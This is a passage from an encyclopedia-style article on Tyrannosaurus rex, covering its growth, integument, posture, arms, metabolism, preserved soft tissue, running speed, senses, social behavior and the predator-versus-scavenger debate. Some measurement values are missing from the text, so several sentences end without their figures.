significantly lowered the great difference between the animal's actual growth rate and the one which would be expected of an animal of its size. The sudden change in growth rate at the end of the growth spurt may indicate physical maturity, a hypothesis which is supported by the discovery of medullary tissue in the femur of a 16 to 20-year-old T. rex from Montana (MOR 1125, also known as B-rex). Medullary tissue is found only in female birds during ovulation, indicating that B-rex was of reproductive age. Further study indicates an age of 18 for this specimen.
In 2016, Mary Higby Schweitzer, Lindsay Zanno, and colleagues confirmed that the soft tissue within the femur of MOR 1125 was medullary tissue. This also confirmed the identity of the specimen as a female. The discovery of medullary bone tissue within Tyrannosaurus may prove valuable in determining the sex of other dinosaur species in future examinations, as the chemical makeup of medullary tissue is unmistakable. Other tyrannosaurids exhibit extremely similar growth curves, although with lower growth rates corresponding to their lower adult sizes. An additional study, published in 2020 in the journal Science Advances by Woodward and colleagues, indicates that during their growth from juvenile to adult, Tyrannosaurus was capable of slowing its growth to counter environmental factors such as a lack of food. The study, focusing on two juvenile specimens between 13 and 15 years old housed at the Burpee Museum in Illinois, indicates that the rate of maturation in Tyrannosaurus was dependent on resource abundance. It also indicates that Tyrannosaurus was particularly well suited to an environment whose resource abundance shifted yearly, hinting that other midsize predators might have had difficulty surviving in such harsh conditions, and explaining the niche partitioning between juvenile and adult tyrannosaurs. The study further indicates that Tyrannosaurus and the dubious genus Nanotyrannus are synonymous, based on analysis of the growth rings in the bones of the two specimens studied. Over half of the known T. rex specimens appear to have died within six years of reaching sexual maturity, a pattern which is also seen in other tyrannosaurs and in some large, long-lived birds and mammals today. These species are characterized by high infant mortality rates, followed by relatively low mortality among juveniles. Mortality increases again following sexual maturity, partly due to the stresses of reproduction. One study suggests that the rarity of juvenile T. rex fossils is due in part to low juvenile mortality rates; the animals were not dying in large numbers at these ages, and thus were not often fossilized. This rarity may also be due to the incompleteness of the fossil record, or to a bias among fossil collectors towards larger, more spectacular specimens. In a 2013 lecture, Thomas Holtz Jr. suggested that dinosaurs "lived fast and died young" because they reproduced quickly, whereas mammals have long lifespans because they take longer to reproduce. Gregory S. Paul also writes that Tyrannosaurus reproduced quickly and died young, but attributes its short lifespan to the dangerous life it lived.

Skin and possible filamentous feathering

The discovery of feathered dinosaurs led to debate regarding whether, and to what extent, Tyrannosaurus might have been feathered. Filamentous structures, which are commonly recognized as the precursors of feathers, were reported in 2004 in the small-bodied, basal tyrannosauroid Dilong paradoxus from the Early Cretaceous Yixian Formation of China. Because integumentary impressions of larger tyrannosauroids known at that time showed evidence of scales, the researchers who studied Dilong speculated that insulating feathers might have been lost by larger species due to their smaller surface-to-volume ratio.
The subsequent discovery of the giant species Yutyrannus huali, also from the Yixian, showed that even some large tyrannosauroids had feathers covering much of their bodies, casting doubt on the hypothesis that feathers were a size-related feature. A 2017 study reviewed the known skin impressions of tyrannosaurids, including those of a Tyrannosaurus specimen nicknamed "Wyrex" (HMNS 2006.1743.01, formerly known as BHI 6230), which preserves patches of mosaic scales on the tail, hip, and neck. The study concluded that feather covering of large tyrannosaurids such as Tyrannosaurus was, if present, limited to the upper side of the trunk. A conference abstract published in 2016 posited that theropods such as Tyrannosaurus had their upper teeth covered in lips, instead of bare teeth as seen in crocodilians. This was based on the presence of enamel, which according to the study needs to remain hydrated, an issue not faced by aquatic animals like crocodilians. The lip hypothesis has been criticized, however: the 2017 analytical study proposed that tyrannosaurids, like modern crocodiles, had large, flat scales on their snouts instead of lips. But crocodiles possess cracked, keratinized skin rather than flat scales; by observing the hummocky rugosity of tyrannosaurid facial bones and comparing it to that of extant lizards, researchers have found that tyrannosaurids had squamose scales rather than crocodilian-like skin. In 2023, Cullen and colleagues supported the idea that theropods like tyrannosaurids had lips, based on anatomical patterns, such as those of the foramina on the face and jaws, that are more similar to those of modern squamates such as monitor lizards or marine iguanas than to those of modern crocodilians like alligators. Comparison of the teeth of Daspletosaurus and American alligators shows that the enamel of tyrannosaurids had no significant wear, while the teeth of modern crocodilians are eroded on the labial side and substantially worn. This suggests that theropod teeth were likely kept wet by lips. On the basis of the relationship between hydration and wear resistance, the authors argued that it is unlikely that the teeth of theropods, including tyrannosaurids, would have remained unworn if exposed for a long time, because it would have been hard to maintain their hydration. The authors also performed regression analyses of the relationship between tooth height and skull length, and found that varanids like the crocodile monitor had substantially greater ratios of tooth height to skull length than Tyrannosaurus, indicating that theropod teeth were not too big to be covered by extraoral tissues when the mouth was closed.

Sexual dimorphism

As the number of known specimens increased, scientists began to analyze the variation between individuals and discovered what appeared to be two distinct body types, or morphs, similar to some other theropod species. As one of these morphs was more solidly built, it was termed the 'robust' morph, while the other was termed 'gracile'. Several morphological differences associated with the two morphs were used to analyze sexual dimorphism in T. rex, with the 'robust' morph usually suggested to be female. For example, the pelvis of several 'robust' specimens seemed to be wider, perhaps to allow the passage of eggs.
It was also thought that the 'robust' morphology correlated with a reduced chevron on the first tail vertebra, also ostensibly to allow eggs to pass out of the reproductive tract, as had been erroneously reported for crocodiles. In recent years, the evidence for sexual dimorphism has been weakened. A 2005 study reported that previous claims of sexual dimorphism in crocodile chevron anatomy were in error, casting doubt on the existence of similar dimorphism between T. rex sexes. A full-sized chevron was discovered on the first tail vertebra of Sue, an extremely robust individual, indicating that this feature could not be used to differentiate the two morphs anyway. As T. rex specimens have been found from Saskatchewan to New Mexico, differences between individuals may be indicative of geographic variation rather than sexual dimorphism. The differences could also be age-related, with 'robust' individuals being older animals. Only a single Tyrannosaurus specimen has been conclusively shown to belong to a specific sex. Examination of B-rex demonstrated the preservation of soft tissue within several bones. Some of this tissue has been identified as medullary tissue, a specialized tissue grown only in modern birds as a source of calcium for the production of eggshell during ovulation. As only female birds lay eggs, medullary tissue is only found naturally in females, although males are capable of producing it when injected with female reproductive hormones like estrogen. This strongly suggests that B-rex was female and that she died during ovulation. Recent research has shown that medullary tissue is never found in crocodiles, which are thought to be the closest living relatives of dinosaurs. The shared presence of medullary tissue in birds and other theropod dinosaurs is further evidence of the close evolutionary relationship between the two.

Posture

Like many bipedal dinosaurs, T. rex was historically depicted as a 'living tripod', with the body at 45 degrees or less from the vertical and the tail dragging along the ground, similar to a kangaroo. This concept dates from Joseph Leidy's 1865 reconstruction of Hadrosaurus, the first to depict a dinosaur in a bipedal posture. In 1915, convinced that the creature stood upright, Henry Fairfield Osborn, then president of the American Museum of Natural History, further reinforced the notion by unveiling the first complete T. rex skeleton arranged this way. It stood in an upright pose for 77 years, until it was dismantled in 1992. By 1970, scientists had realized this pose was incorrect and could not have been maintained by a living animal, as it would have resulted in the dislocation or weakening of several joints, including the hips and the articulation between the head and the spinal column. The inaccurate AMNH mount inspired similar depictions in many films and paintings (such as Rudolph Zallinger's famous mural The Age of Reptiles in Yale University's Peabody Museum of Natural History) until the 1990s, when films such as Jurassic Park introduced a more accurate posture to the general public. Modern representations in museums, art, and film show T. rex with its body approximately parallel to the ground and the tail extended behind the body to balance the head. To sit down, Tyrannosaurus may have settled its weight backwards and rested it on a pubic boot, the wide expansion at the end of the pubis in some dinosaurs. With its weight resting on the pelvis, it may have been free to move the hindlimbs.
Getting back up again might have involved some stabilization from the diminutive forelimbs; this idea, known as Newman's push-up theory, has been debated. Nonetheless, Tyrannosaurus was probably able to get up if it fell, which would only have required placing the limbs below the center of gravity, with the tail as an effective counterbalance. Healed stress fractures in the forelimbs have been put forward both as evidence that the arms cannot have been very useful and as evidence that they were indeed used and acquired wounds, like the rest of the body.

Arms

When T. rex was first discovered, the humerus was the only element of the forelimb known. For the initial mounted skeleton as seen by the public in 1915, Osborn substituted longer, three-fingered forelimbs like those of Allosaurus. A year earlier, Lawrence Lambe had described the short, two-fingered forelimbs of the closely related Gorgosaurus. This strongly suggested that T. rex had similar forelimbs, but the hypothesis was not confirmed until the first complete T. rex forelimbs were identified in 1989, belonging to MOR 555 (the "Wankel rex"). The remains of Sue also include complete forelimbs. T. rex arms are very small relative to overall body size, measuring only long, and some scholars have labelled them as vestigial. However, the bones show large areas for muscle attachment, indicating considerable strength. This was recognized as early as 1906 by Osborn, who speculated that the forelimbs may have been used to grasp a mate during copulation. Newman (1970) suggested that the forelimbs were used to assist Tyrannosaurus in rising from a prone position. Since then, other functions have been proposed, although some scholars find them implausible. Padian (2022) argued that the reduction of the arms in tyrannosaurids did not serve a particular function but was a secondary adaptation, stating that as tyrannosaurids developed larger and more powerful skulls and jaws, the arms got smaller to avoid being bitten or torn by other individuals, particularly during group feedings. Another possibility is that the forelimbs held struggling prey while it was killed by the tyrannosaur's enormous jaws. This hypothesis may be supported by biomechanical analysis. T. rex forelimb bones exhibit extremely thick cortical bone, which has been interpreted as evidence that they were developed to withstand heavy loads. The biceps brachii muscle of an adult T. rex was capable of lifting by itself; other muscles, such as the brachialis, would have worked along with the biceps to make elbow flexion even more powerful. The M. biceps muscle of T. rex was 3.5 times as powerful as the human equivalent. A T. rex forearm had a limited range of motion, with the shoulder and elbow joints allowing only 40 and 45 degrees of motion, respectively. In contrast, the same two joints in Deinonychus allow up to 88 and 130 degrees of motion, respectively, while a human arm can rotate 360 degrees at the shoulder and move through 165 degrees at the elbow. The heavy build of the arm bones, the strength of the muscles, and the limited range of motion may indicate a system evolved to hold fast despite the stresses of a struggling prey animal. In the first detailed scientific description of Tyrannosaurus forelimbs, paleontologists Kenneth Carpenter and Matt Smith dismissed notions that the forelimbs were useless or that Tyrannosaurus was an obligate scavenger. The idea that the arms served as weapons when hunting prey has also been proposed by Steven M.
Stanley, who suggested that the arms were used for slashing prey, especially by using the claws to rapidly inflict long, deep gashes. This was dismissed by Padian, who argued that Stanley based his conclusion on incorrectly estimated forelimb size and range of motion.

Thermoregulation

Tyrannosaurus, like most dinosaurs, was long thought to have had an ectothermic ("cold-blooded") reptilian metabolism. The idea of dinosaur ectothermy was challenged by scientists like Robert T. Bakker and John Ostrom in the early years of the "Dinosaur Renaissance", beginning in the late 1960s. T. rex itself was claimed to have been endothermic ("warm-blooded"), implying a very active lifestyle. Since then, several paleontologists have sought to determine the ability of Tyrannosaurus to regulate its body temperature. Histological evidence of high growth rates in young T. rex, comparable to those of mammals and birds, may support the hypothesis of a high metabolism. Growth curves indicate that, as in mammals and birds, T. rex growth was limited mostly to immature animals, rather than continuing indeterminately as in most other vertebrates. Oxygen isotope ratios in fossilized bone are sometimes used to determine the temperature at which the bone was deposited, as the ratio between certain isotopes correlates with temperature. In one specimen, the isotope ratios in bones from different parts of the body indicated a temperature difference of no more than between the vertebrae of the torso and the tibia of the lower leg. This small temperature range between the body core and the extremities was claimed by paleontologist Reese Barrick and geochemist William Showers to indicate that T. rex maintained a constant internal body temperature (homeothermy) and that it enjoyed a metabolism somewhere between those of ectothermic reptiles and endothermic mammals. Other scientists have pointed out that the ratio of oxygen isotopes in the fossils today does not necessarily represent the same ratio in the distant past, and may have been altered during or after fossilization (diagenesis). Barrick and Showers have defended their conclusions in subsequent papers, finding similar results in another theropod dinosaur from a different continent and tens of millions of years earlier in time (Giganotosaurus). Ornithischian dinosaurs also showed evidence of homeothermy, while varanid lizards from the same formation did not. In 2022, Wiemann and colleagues used a different approach, the spectroscopy of lipoxidation signals, which are byproducts of oxidative phosphorylation and correlate with metabolic rates, to show that various dinosaur genera, including Tyrannosaurus, had endothermic metabolisms, on par with those of modern birds and higher than those of mammals. They also suggested that such a metabolism was ancestrally common to all dinosaurs. Even if T. rex does exhibit evidence of homeothermy, it does not necessarily mean that it was endothermic. Such thermoregulation may also be explained by gigantothermy, as in some living sea turtles. Similar to those of contemporary crocodilians, openings (dorsotemporal fenestrae) in the skull roof of Tyrannosaurus may have aided thermoregulation.

Soft tissue

In the March 2005 issue of Science, Mary Higby Schweitzer of North Carolina State University and colleagues announced the recovery of soft tissue from the marrow cavity of a fossilized leg bone of a T. rex.
The bone had been intentionally, though reluctantly, broken for shipping and then not preserved in the normal manner, specifically because Schweitzer was hoping to test it for soft tissue. Designated as Museum of the Rockies specimen 1125, or MOR 1125, the dinosaur had previously been excavated from the Hell Creek Formation. Flexible, bifurcating blood vessels and fibrous but elastic bone matrix tissue were recognized. In addition, microstructures resembling blood cells were found inside the matrix and vessels. The structures bear resemblance to ostrich blood cells and vessels. The researchers do not know whether an unknown process, distinct from normal fossilization, preserved the material, or whether the material is original, and they are careful not to make any claims about preservation. If it is found to be original material, any surviving proteins may be used as a means of indirectly inferring some of the DNA content of the dinosaurs involved, because each protein is typically created by a specific gene. The absence of previous finds may be the result of people assuming that preserved tissue was impossible, and therefore not looking for it. Since the first find, two more tyrannosaurs and a hadrosaur have also been found to have such tissue-like structures. Research on some of the tissues involved has suggested that birds are closer relatives of tyrannosaurs than other modern animals. Original endogenous chemistry was also found in MOR 1125, based on the preservation of elements associated with bone remodeling and redeposition (sulfur, calcium, zinc), which showed that the bone cortices are similar to those of extant birds. In studies reported in Science in April 2007, Asara and colleagues concluded that seven traces of collagen proteins detected in purified T. rex bone most closely match those reported in chickens, followed by frogs and newts. The discovery of proteins from a creature tens of millions of years old, along with similar traces the team found in a mastodon bone at least 160,000 years old, upends the conventional view of fossils and may shift paleontologists' focus from bone hunting to biochemistry. Until these finds, most scientists presumed that fossilization replaced all living tissue with inert minerals. Paleontologist Hans Larsson of McGill University in Montreal, who was not part of the studies, called the finds "a milestone", and suggested that dinosaurs could "enter the field of molecular biology and really slingshot paleontology into the modern world". The presumed soft tissue was called into question by Thomas Kaye of the University of Washington and his co-authors in 2008. They contend that what was really inside the tyrannosaur bone was slimy biofilm created by bacteria that coated the voids once occupied by blood vessels and cells. The researchers found that what had previously been identified as remnants of blood cells, because of the presence of iron, were actually framboids, microscopic mineral spheres bearing iron. They found similar spheres in a variety of other fossils from various periods, including an ammonite. In the ammonite, they found the spheres in a place where the iron they contain could not have had any relationship to the presence of blood. Schweitzer has strongly criticized Kaye's claims and argues that there is no reported evidence that biofilms can produce branching, hollow tubes like those noted in her study.
San Antonio, Schweitzer, and colleagues published an analysis in 2011 of which parts of the collagen had been recovered, finding that it was the inner parts of the collagen coil that had been preserved, as would be expected after a long period of protein degradation. Other research challenges the identification of soft tissue as biofilm and confirms the finding of "branching, vessel-like structures" within fossilized bone.

Speed

Scientists have produced a wide range of possible maximum running speeds for Tyrannosaurus: mostly around , but as low as and as high as , though running at the top of this range is considered very unlikely. As a bulky and heavy carnivore, Tyrannosaurus was unlikely to run very fast compared to other theropods like Carnotaurus or Giganotosaurus. Researchers have relied on various estimating techniques because, while there are many tracks of large theropods walking, none show evidence of running. A 2002 report used a mathematical model (validated by applying it to three living animals, alligators, chickens, and humans, and later to eight more species, including emus and ostriches) to gauge the leg muscle mass needed for fast running (over ). Scientists who think that Tyrannosaurus was able to run point out that hollow bones and other features that would have lightened its body may have kept adult weight to a mere or so, or that other animals like ostriches and horses, with long, flexible legs, are able to achieve high speeds through slower but longer strides. Proposed top speeds exceeded for Tyrannosaurus, but were deemed infeasible because they would require exceptional leg muscles of approximately 40-86% of total body mass. Even moderately fast speeds would have required large leg muscles. If the muscle mass was less, only walking or jogging would have been possible. Holtz noted that tyrannosaurids and some closely related groups had significantly longer distal hindlimb components (shin plus foot plus toes) relative to femur length than most other theropods, and that tyrannosaurids and their close relatives had a tightly interlocked metatarsus (foot bones). The third metatarsal was squeezed between the second and fourth metatarsals to form a single unit called an arctometatarsus. This ankle feature may have helped the animal to run more efficiently. Together, these leg features allowed Tyrannosaurus to transmit locomotory forces from the foot to the lower leg more effectively than in earlier theropods. Additionally, a 2020 study indicates that Tyrannosaurus and other tyrannosaurids were exceptionally efficient walkers. Studies by Dececchi et al. compared the leg proportions, body mass, and gaits of more than 70 species of theropod dinosaurs, including Tyrannosaurus and its relatives. The research team then applied a variety of methods to estimate each dinosaur's top speed when running, as well as how much energy each dinosaur expended while moving at more relaxed speeds, such as when walking. Among smaller to medium-sized species such as dromaeosaurids, longer legs appear to be an adaptation for faster running, in line with previous results by other researchers. But for theropods weighing over , top running speed is limited by body size, so longer legs were instead found to have correlated with low-energy walking.
The results further indicate that smaller theropods evolved long legs both to aid in hunting and to escape from larger predators, while larger theropods that evolved long legs did so to reduce energy costs and increase foraging efficiency, as they were freed from the demands of predation pressure by their role as apex predators. Compared to more basal groups of theropods in the study, tyrannosaurs like Tyrannosaurus itself showed a marked increase in foraging efficiency due to reduced energy expenditure during hunting or scavenging. This in turn likely meant that tyrannosaurs needed fewer hunting forays and less food to sustain themselves. Additionally, the research, in conjunction with studies showing that tyrannosaurs were more agile than other large-bodied theropods, indicates that they were well adapted to a long-distance stalking approach followed by a quick burst of speed to make the kill. Analogies can be drawn between tyrannosaurids and modern wolves as a result, supported by evidence that at least some tyrannosaurids hunted in group settings. A study published in 2021 by Pasha van Bijlert et al. calculated the preferred walking speed of Tyrannosaurus, reporting a speed of . While walking, animals reduce their energy expenditure by choosing certain step rhythms at which their body parts resonate. The same would have been true for dinosaurs, but previous studies did not fully account for the impact of the tail on their walking speeds. According to the authors, when a dinosaur walked, its tail would sway slightly up and down with each step as a result of the interspinous ligaments suspending the tail. Like rubber bands, these ligaments stored energy when stretched by the swaying of the tail. Using a 3-D model of the Tyrannosaurus specimen Trix, the researchers reconstructed the muscles and ligaments to simulate the tail movements. This resulted in a rhythmic, energy-efficient walking speed for Tyrannosaurus similar to that seen in living animals such as humans, ostriches, and giraffes. A 2017 study estimated the top running speed of Tyrannosaurus as , speculating that Tyrannosaurus exhausted its energy reserves long before reaching top speed, resulting in a parabola-like relationship between size and speed. Another 2017 study hypothesized that an adult Tyrannosaurus was incapable of running due to high skeletal loads. Using a calculated weight estimate of 7 tons, the model showed that speeds above would probably have shattered the leg bones of Tyrannosaurus. The finding may mean that running was also not possible for other giant theropod dinosaurs like Giganotosaurus, Mapusaurus, and Acrocanthosaurus. However, studies by Eric Snively and colleagues published in 2019 indicate that Tyrannosaurus and other tyrannosaurids were more maneuverable than allosauroids and other theropods of comparable size, due to low rotational inertia compared to their body mass, combined with large leg muscles. As a result, it is hypothesized that Tyrannosaurus was capable of making relatively quick turns and could likely pivot its body more quickly when close to its prey, or that, while turning, the theropod could "pirouette" on a single planted foot while the alternating leg was held out in a suspended swing during a pursuit. The results of this study could potentially shed light on how agility contributed to the success of tyrannosaurid evolution.
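The resonance principle underlying the 2021 preferred-walking-speed estimate can be illustrated with a simplified mass-and-spring model. This is only an illustrative sketch, not the study's actual musculoskeletal simulation, and the quantities used here (an effective tail mass m, a combined ligament stiffness k, and a step length d) are assumptions introduced for the example. Treating the ligament-suspended tail as a mass on a spring, its natural frequency is

$$f = \frac{1}{2\pi}\sqrt{\frac{k}{m}},$$

and, if the animal times its steps to match this frequency, the energetically preferred walking speed follows as the product of step length and step frequency, $v_{\text{pref}} \approx d \cdot f$.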
Possible footprints

Rare fossil footprints and trackways found in New Mexico and Wyoming, assigned to the ichnogenus Tyrannosauripus, have been attributed to Tyrannosaurus, based on the stratigraphic age of the rocks in which they are preserved. The first specimen, found in 1994, was described by Lockley and Hunt and consists of a single, large footprint. Another pair of ichnofossils, described in 2021, shows a large tyrannosaurid rising from a prone position, pushing itself up with its elbows in conjunction with the pads on its feet. These two unique sets of fossils were found in Ludlow, Colorado, and Cimarron, New Mexico. Another ichnofossil, described in 2018 and perhaps belonging to a juvenile Tyrannosaurus or to the dubious genus Nanotyrannus, was uncovered in the Lance Formation of Wyoming. The trackway offers a rare glimpse into the walking speed of tyrannosaurids; the trackmaker is estimated to have been moving at a speed of , significantly faster than previously assumed for estimations of walking speed in tyrannosaurids.

Brain and senses

A study conducted by Lawrence Witmer and Ryan Ridgely of Ohio University found that Tyrannosaurus shared the heightened sensory abilities of other coelurosaurs, highlighting relatively rapid and coordinated eye and head movements; an enhanced ability to sense low-frequency sounds, which would allow tyrannosaurs to track prey movements from long distances; and an enhanced sense of smell. A study published by Kent Stevens concluded that Tyrannosaurus had keen vision. By applying modified perimetry to facial reconstructions of several dinosaurs, including Tyrannosaurus, the study found that Tyrannosaurus had a binocular range of 55 degrees, surpassing that of modern hawks. Stevens estimated that Tyrannosaurus had 13 times the visual acuity of a human, surpassing the visual acuity of an eagle, which is 3.6 times that of a person. Stevens estimated a limiting far point (that is, the distance at which an object can be seen as separate from the horizon) as far as away, greater than the that a human can see. Thomas Holtz Jr. noted that the high depth perception of Tyrannosaurus may have been driven by the prey it had to hunt: ceratopsians such as Triceratops, ankylosaurs such as Ankylosaurus, and hadrosaurs. He suggested that this made precision more crucial for Tyrannosaurus, enabling it to "get in, get that blow in and take it down". In contrast, Acrocanthosaurus had limited depth perception because it hunted large sauropods, which were relatively rare during the time of Tyrannosaurus. Though no Tyrannosaurus sclerotic ring has been found, Kenneth Carpenter estimated its size based on that of Gorgosaurus. The inferred sclerotic ring for the Stan specimen is ~ in diameter, with an internal aperture diameter of ~. Based on eye proportions in living reptiles, this implies a pupil diameter of about , an iris diameter about that of the sclerotic ring, and an eyeball diameter of . Carpenter also estimated an eyeball depth of ~. Based on these calculations, the f-number (focal length divided by aperture diameter) for Stan's eye is 3-3.8; since diurnal animals have f-numbers of 2.1 or higher, this would indicate that Tyrannosaurus had poor low-light vision and hunted during the day. Tyrannosaurus had very large olfactory bulbs and olfactory nerves relative to its brain size, the organs responsible for a heightened sense of smell.
This suggests that the sense of smell was highly developed, and implies that tyrannosaurs could detect carcasses by scent alone across great distances. The sense of smell in tyrannosaurs may have been comparable to that of modern vultures, which use scent to track carcasses for scavenging. Research on the olfactory bulbs has shown that T. rex had the most highly developed sense of smell of 21 sampled non-avian dinosaur species. Somewhat unusually among theropods, T. rex had a very long cochlea. The length of the cochlea is often related to hearing acuity, or at least to the importance of hearing in behavior, implying that hearing was a particularly important sense to tyrannosaurs. Specifically, the data suggest that T. rex heard best in the low-frequency range, and that low-frequency sounds were an important part of tyrannosaur behavior. A 2017 study by Thomas Carr and colleagues found that the snout of tyrannosaurids was highly sensitive, based on the high number of small openings in the facial bones of the related Daspletosaurus that contained sensory neurons. The study speculated that tyrannosaurs might have used their sensitive snouts to measure the temperature of their nests and to gently pick up eggs and hatchlings, as seen in modern crocodylians. Another study, published in 2021 by Kawabe and Hattori, further suggests that Tyrannosaurus had an acute sense of touch, based on neurovascular canals in the front of its jaws, which it could have used to better detect and consume prey. The study suggests that Tyrannosaurus could also accurately sense slight differences in material and movement, allowing it to use different feeding strategies on different parts of its prey's carcasses depending on the situation. The sensitive neurovascular canals of Tyrannosaurus were also likely adapted to fine movements and behaviors such as nest building, parental care, and other social behavior such as intraspecific communication. These results align with those obtained in studies of the related tyrannosaurid Daspletosaurus horneri and the allosauroid Neovenator, which have similar neurovascular adaptations, suggesting that the faces of theropods were highly sensitive to pressure and touch. However, a more recent study reviewing the evolution of trigeminal canals among sauropsids notes that a much denser network of neurovascular canals in the snout and lower jaw is more commonly encountered in aquatic or semiaquatic taxa (e.g., Spinosaurus, Halszkaraptor, Plesiosaurus) and in taxa that developed a rhamphotheca (e.g., Caenagnathasia), while the network of canals in Tyrannosaurus appears simpler, though still more derived than in most ornithischians. Overall, terrestrial taxa such as tyrannosaurids and Neovenator may have had average facial sensitivity for non-edentulous terrestrial theropods, although further research is needed. The neurovascular canals in Tyrannosaurus may instead have supported soft-tissue structures for thermoregulation or social signaling; the latter could be supported by the fact that the neurovascular network of canals may have changed during ontogeny. A study by Grant R. Hurlburt, Ryan C. Ridgely, and Lawrence Witmer obtained estimates for encephalization quotients (EQs), based on reptiles and birds, as well as estimates for the ratio of cerebrum mass to brain mass.
The study concluded that Tyrannosaurus had the relatively largest brain of all adult non-avian dinosaurs, with the exception of certain small maniraptoriforms (Bambiraptor, Troodon, and Ornithomimus). The study found that Tyrannosaurus's relative brain size was still within the range of modern reptiles, being at most 2 standard deviations above the mean of non-avian reptile EQs. The estimates for the ratio of cerebrum mass to brain mass ranged from 47.5 to 49.53 percent. According to the study, this is more than the lowest estimates for extant birds (44.6 percent), but still close to the typical ratios of the smallest sexually mature alligators, which range from 45.9 to 47.9 percent. Other studies, such as those by Steve Brusatte, indicate that the encephalization quotient of Tyrannosaurus was similar in range (2.0-2.4) to that of a chimpanzee (2.2-2.5), though this may be debatable, as reptilian and mammalian encephalization quotients are not equivalent.

Social behavior

Philip J. Currie suggested that Tyrannosaurus may have been a pack hunter, comparing T. rex to the related species Tarbosaurus bataar and Albertosaurus sarcophagus and citing fossil evidence that may indicate gregarious behavior (traveling in herds or packs). A find in South Dakota where three T. rex skeletons were in close proximity may suggest the formation of a pack. Cooperative pack hunting may have been an effective strategy for subduing prey with advanced, potentially lethal anti-predator adaptations, such as Triceratops and Ankylosaurus. Currie's pack-hunting hypothesis for T. rex has been criticized for not having been peer-reviewed, having instead been presented in a television interview and a book called Dino Gangs. Currie's theory of pack hunting in T. rex rests mainly on analogy with a different species, Tarbosaurus bataar. Evidence of gregariousness in T. bataar itself has not been peer-reviewed and, by Currie's own admission, can only be interpreted with reference to evidence in other, closely related species. According to Currie, gregariousness in Albertosaurus sarcophagus is supported by the discovery of 26 individuals of varied ages in the Dry Island bonebed. He ruled out the possibility of a predator trap due to the similar preservation state of the individuals and the near absence of herbivores. Additional support for tyrannosaurid gregariousness can be found in fossilized trackways from the Upper Cretaceous Wapiti Formation of northeastern British Columbia, Canada, left by three tyrannosaurids traveling in the same direction. According to scientists assessing the Dino Gangs program, the evidence for pack hunting in Tarbosaurus and Albertosaurus is weak and based on group skeletal remains for which alternative explanations may apply (such as drought or a flood forcing dinosaurs to die together in one place). Other researchers have speculated that, instead of large theropod social groups, some of these finds represent behavior more akin to Komodo dragon-like mobbing of carcasses, even going so far as to suggest that true pack-hunting behavior may not have existed in any non-avian dinosaurs, due to its rarity in modern predators. Evidence of intraspecific attack was found by Joseph Peterson and his colleagues in the juvenile Tyrannosaurus nicknamed Jane. Peterson and his team found that Jane's skull showed healed puncture wounds on the upper jaw and snout, which they believe came from another juvenile Tyrannosaurus.
Subsequent CT scans of Jane's skull further confirmed the team's hypothesis, showing that the puncture wounds came from a traumatic injury and that there was subsequent healing. The team also stated that Jane's injuries were structurally different from the parasite-induced lesions found in Sue, and that Jane's injuries were on its face, whereas the parasite that infected Sue caused lesions to the lower jaw. Pathologies of other Tyrannosaurus specimens have been suggested as evidence of conspecific attack, including "Wyrex", which has a hole penetrating its jugal and severe trauma on its tail that shows signs of bone remodeling (not regrowth).

Feeding strategies

Most paleontologists accept that Tyrannosaurus was both an active predator and a scavenger, like most large carnivores. By far the largest carnivore in its environment, T. rex was most likely an apex predator, preying upon hadrosaurs, armored herbivores like ceratopsians and ankylosaurs, and possibly sauropods. Enamel δ44/42Ca values also suggest the possibility that T. rex occasionally fed on the carcasses of marine reptiles and fish washed up on the shores of the Western Interior Seaway. A study in 2012 by Karl Bates and Peter Falkingham found that Tyrannosaurus had the most powerful bite of any terrestrial animal that has ever lived, estimating that an adult Tyrannosaurus could have exerted 35,000 to 57,000 N (7,868 to 12,814 lbf) of force with its back teeth. Even higher estimates were made by Mason B. Meers in 2003. This allowed it to crush bones during repetitive biting and to fully consume the carcasses of large dinosaurs. Stephan Lautenschlager and colleagues calculated that Tyrannosaurus was capable of a maximum jaw gape of around 80 degrees, a necessary adaptation for a wide range of jaw angles to power the creature's strong bite. A debate exists, however, about whether Tyrannosaurus was primarily a predator or a pure scavenger. The debate originated in a 1917 study by Lambe, which argued that large theropods were pure scavengers because Gorgosaurus teeth showed hardly any wear. This argument disregarded the fact that theropods replaced their teeth quite rapidly. Ever since the first discovery of Tyrannosaurus, most scientists have speculated that it was a predator; like modern large predators, it would readily scavenge or steal another predator's kill if it had the opportunity. Paleontologist Jack Horner has been a major proponent of the view that Tyrannosaurus was not a predator at all, but instead was exclusively a scavenger. He has put forward several arguments in the popular literature to support the pure scavenger hypothesis. First, tyrannosaur arms are short when compared to those of other known predators. Horner argues that the arms were too short to make the necessary gripping force to hold on to prey. Other paleontologists, such as Thomas Holtz Jr., counter that there are plenty of modern-day predators that do not use their forelimbs to hunt, such as wolves, hyenas, and secretary birds, as well as other extinct animals thought to be predators that would not have used their forelimbs, such as phorusrhacids. Second, tyrannosaurs had large olfactory bulbs and olfactory nerves (relative to their brain size). These suggest a highly developed sense of smell which could sniff out carcasses over great distances, as modern vultures do. Research on the olfactory bulbs of dinosaurs has shown that Tyrannosaurus had the most highly developed sense of smell of 21 sampled dinosaurs.
Third, tyrannosaur teeth could crush bone, and therefore could extract as much food (bone marrow) as possible from carcass remnants, usually the least nutritious parts. Karen Chin and colleagues have found bone fragments in coprolites (fossilized feces) that they attribute to tyrannosaurs, but point out that a tyrannosaur's teeth were not well adapted to systematically chewing bone like hyenas do to extract marrow. Finally, since at least some of Tyrannosaurus's potential prey could move quickly, evidence that it walked instead of ran could indicate that it was a scavenger. On the other hand, recent analyses suggest that Tyrannosaurus, while slower than large modern terrestrial predators, may well have been fast enough to prey on large hadrosaurs and ceratopsians. Other evidence suggests hunting behavior in Tyrannosaurus. The eye sockets of tyrannosaurs are positioned so that the eyes would point forward, giving them binocular vision slightly better than that of modern hawks. It is not obvious why natural selection would have favored this long-term trend if tyrannosaurs had been pure scavengers, which would not have needed the advanced depth perception that stereoscopic vision provides. In modern animals, binocular vision is found mainly in predators. A skeleton of the hadrosaurid Edmontosaurus annectens has been described from Montana with healed tyrannosaur-inflicted damage on its tail vertebrae. The fact that the damage seems to have healed suggests that the Edmontosaurus survived a tyrannosaur's attack on a living target, i.e. the tyrannosaur had attempted active predation. Despite the consensus that the tail bites were caused by Tyrannosaurus, some evidence suggests that they might have been created by other factors. For example, a 2014 study suggested that the tail injuries might have been due to Edmontosaurus individuals stepping on each other, while another study in 2020 supported the hypothesis that biomechanical stress is the cause of the tail injuries. There is also evidence of an aggressive interaction between a Triceratops and a Tyrannosaurus in the form of partially healed tyrannosaur tooth marks on a Triceratops brow horn and squamosal (a bone of the neck frill); the bitten horn is also broken, with new bone growth after the break. It is not known what the exact nature of the interaction was, though: either animal could have been the 